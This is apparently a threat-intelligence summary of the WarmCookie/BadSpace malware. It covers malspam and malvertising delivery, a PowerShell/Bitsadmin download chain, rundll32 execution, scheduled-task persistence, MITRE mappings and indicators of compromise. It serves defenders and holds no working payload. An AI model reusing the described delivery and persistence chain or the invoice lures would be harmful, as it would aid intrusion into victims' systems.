Threat Focus: WarmCookie/BadSpace

WarmCookie (also known as BadSpace) surfaced in April 2024 and is used for initial access and persistence to maintain long-term presence, delivering additional malware such as CSharp-Streamer-RAT and Cobalt Strike. It shows significant overlap with TA866 activity and with the Resident backdoor, suggesting a shared threat actor lineage. #WarmCookie #BadSpace #TA866 #ResidentBackdoor #CobaltStrike #CSharpStreamerRAT

Keypoints

Emergence: WarmCookie was first observed in April 2024.
Distribution Methods: Primarily spread through malspam and malvertising campaigns.
Functionality: Offers payload deployment, file manipulation, command execution, screenshot collection, and persistence.
Relation to Other Malware: Used to deliver CSharp-Streamer-RAT and Cobalt Strike.
Threat Actor Attribution: Likely developed by the same actor behind the Resident backdoor and TA866/Asylum Ambuscade.
Campaign Themes: Uses lure themes such as invoice-related and job agency messages.
Evolution: Latest samples show updates in execution methods and persistence mechanisms, with evolving C2 and sandbox considerations.

MITRE Techniques

[T1566.001] Phishing: Spearphishing Attachment – Malspam and PDFs used to deliver WarmCookie. – “Malspam and malvertising campaigns used to deliver malware.”
[T1566.002] Phishing: Spearphishing Link – PDFs contain hyperlinks directing to web servers hosting malicious JavaScript. – “The PDFs contain hyperlinks that direct victims to web servers hosting malicious JavaScript files that continue the infection process.”
[T1189] Drive-by Compromise – Malvertising campaigns to initiate infection and delivery. – “these campaigns typically rely on malspam or malvertising to initiate the infection process that results in the delivery of WarmCookie.”
[T1059.001] Command and Scripting Interpreter: PowerShell – Execution flow involves PowerShell commands. – “deobfuscates and executes a PowerShell command that uses Bitsadmin to retrieve and execute the WarmCookie DLL.”
[T1197] BITS Jobs – Use of Bitsadmin to fetch and run payloads. – “uses Bitsadmin to retrieve and execute the WarmCookie DLL.”
[T1053.005] Persistence: Scheduled Task – Creation of scheduled tasks to maintain persistence. – “creating a scheduled task via the Windows Task Scheduler, which spawns a copy of the malware after waiting for 60 seconds.”
[T1071.001] Web Protocols – C2 communications over SSL-enabled channels. – “Communications with C2 servers using SSL certificates.”
[T1218.011] Signed Binary Proxy Execution: Rundll32 – DLL payloads executed via rundll32 with Start parameters. – “rundll32.exe ,Start /p”
[T1003] Credential Dumping – Potential credential dumping techniques observed. – “Potential use of credential dumping techniques.”

Indicators of Compromise

[URL] Web delivery path – /wp-content/upgrade/update[.]php, hosted on an infrastructure cluster (LandUpdates808). – examples: /wp-content/upgrade/update[.]php
[File name] Attachment pattern – Attachment_[0-9]{3}-[0-9]{3}.pdf, used in malspam campaigns. – examples: Attachment_123-456.pdf, Attachment_000-111.pdf
[Email Subject] Malspam subjects – “United Rentals Inc: Invoice# [0-9]{9}-[0-9]{3}” and “Invoice and Remittance.”
[Domain] Infrastructure cluster – LandUpdates808 cluster used for hosting malicious JavaScript downloaders.
[Archive] ZIP archives – Used to compress the JavaScript downloader before delivery.
[Hash] ClamAV signatures – Win.Malware.Warmcookie-10036688-0, Win.Malware.CSsharpStreamer-10036641-0 (detection signatures referenced in the analysis).
[Hash] Additional detections – Js.Downloader.Agent-10022279-0, Js.Trojan.Screenshotter-10022306-0, Win.Malware.Warmcookie-10036688-0 (examples seen in the signature lists).